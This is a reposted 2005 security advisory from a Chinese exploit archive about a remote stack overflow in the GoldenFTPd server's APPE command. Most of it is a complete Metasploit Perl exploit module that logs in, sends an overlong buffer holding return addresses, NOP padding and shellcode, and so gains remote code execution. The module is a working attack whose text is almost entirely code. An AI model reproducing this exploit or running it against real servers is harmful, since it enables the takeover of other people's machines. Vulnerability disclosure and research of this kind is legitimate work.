首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
GoldenFTPd APPE Stack Overflow
来源:redsand@redsand.net 作者:Tim 发布时间:2005-12-23  

GoldenFTPd APPE Stack Overflow (Exploit)

Summary
"Golden FTP Server is extremely easy to use personal FTP server for Windows and can be run by any person who has the most basic computer skills."

A vulnerability in GoldenFTPd allows remote attackers to cause the product to execute arbitrary by overflowing the APPE FTP command's buffer.

Credit:
The information has been provided by Tim Shelton.

Details
Vulnerable Systems:
* Universal GoldenFTPd version 1.93 and prior

Exploit:
##
# Written by Tim Shelton [redsand@redsand.net]
# GoldenFTPd
##

package Msf::Exploit::goldenftpd_appe;
use base "Msf::Exploit";
use strict;
use Pex::Text;

my $advanced = { };

my $info =
{
'Name' => 'GoldenFTPd APPE <= 1.92 Stack Overflow',
'Version' => '$Revision: 1.0 $',
'Authors' => [ 'Tim Shelton <redsand [at] redsand.net>', ],

'Arch' => [ 'x86' ],
'OS' => [ 'win32', 'win2000', 'winxp', 'win2003' ],
'Priv' => 0,

'AutoOpts' => { 'EXITFUNC' => 'thread' },
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 21],
'USER' => [1, 'DATA', 'Username', 'anonymous'],
'PASS' => [1, 'DATA', 'Password', 'metasploit@'],
},

'Payload' =>
{
'Space' => 400,
'BadChars' => "\x00\x0a\x0d\x20",
'Keys' => ['+ws2ord'],
},

'Description' => Pex::Text::Freeform(qq{
This module exploits a stack overflow in the GoldenFTPd
server. The flaw is triggered when a APPE command is received
with a specially crafted overly-long argument. This vulnerability
affects all versions of GoldenFTPd prior to 1.92 and was discovered by
Tim Shelton.
}),

'Refs' =>
[
['RED-NET', '2005-11-14-01'],
],

'DefaultTarget' => 0,
'Targets' =>
[
['GoldenFTPd Server <= 1.92 Universal', 0x99998888, 0x11111111, 0x98d855eb, 0x0044395F],
],

'Keys' => ['goldenftp'],

'DisclosureDate' => 'NONE',
};

sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}

sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx = $self->GetVar('TARGET');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $target = $self->Targets->[$target_idx];

if (! $self->InitNops(30)) {
$self->PrintLine("[*] Failed to initialize the NOP module.");
return;
}

# my $shellcode = "\xeb\xfe\xeb\xfe\xeb\xfe\xeb\xfe\xeb\xfe\xeb\xfe";


my $evil = ("APPE /");
$evil .= ("A/")x120;

$evil .= (pack("V",$target->[3])) x 4;
$evil .= (pack("V",$target->[1]) . pack("V",$target->[2]) . pack("V",$target->[4]) . pack("V", $target->[1]) ) x 4;
$evil .= $self->MakeNops(30);
$evil .= $shellcode;
$evil .= "\x0a\x0d";

my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
);

$self->PrintLine(sprintf ("[*] Universal GoldenFTPd 1.93 Exploit by redsand\n"));

if ($s->IsError) {
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return;
}

$self->PrintLine(sprintf ("[*] Trying ".$target->[0]." using return address 0x%.8x....", $target->[4]));

my $r = $s->Recv(-1, 30);
if (! $r) { $self->PrintLine("[*] No response from FTP server"); return; }
($r) = $r =~ m/^([^\n\r]+)(\r|\n)/;
$self->PrintLine("[*] $r");

$self->PrintLine("[*] Login as " .$self->GetVar('USER'). "/" .$self->GetVar('PASS'));
$s->Send("USER ".$self->GetVar('USER')."\r\n");
$r = $s->Recv(-1, 10);
if (! $r) { $self->PrintLine("[*] No response from FTP server"); return; }

$s->Send("PASS ".$self->GetVar('PASS')."\r\n");
$r = $s->Recv(-1, 10);
if (! $r) { $self->PrintLine("[*] No response from FTP server"); return; }

$self->PrintLine("[*] Sending evil buffer....");
$s->Send($evil);
$r = $s->Recv(-1, 10);
if (! $r) { $self->PrintLine("[*] No response from FTP server"); return; }
$self->Print("[*] $r");
return;
}



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·Yahoo! Messenger Webcam 8.1 Ac
·VideoScript 3.0 <= 4.0.1.50 Of
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Mailenable Enterprise Examine
·samba-2.2.8 < remote root e
·Macromedia Flash Media Server
·wu_ftpd <=2.6.1 remote root
·Eudora Qualcomm WorldMail LIST
·GKrellM Vulnerable to Remotely
·Microsoft IIS Malformed HTTP R
·identd 1.2 remote exploit
·Mailenable Enterprise EXAMINE
·PHP-Fusion 6.x rating Paramete
·Flatnuke Authentication Bypass
·Veritas Storage Foundation VCS
  推荐广告
CopyRight © 2002-2021 VFocuS.Net All Rights Reserved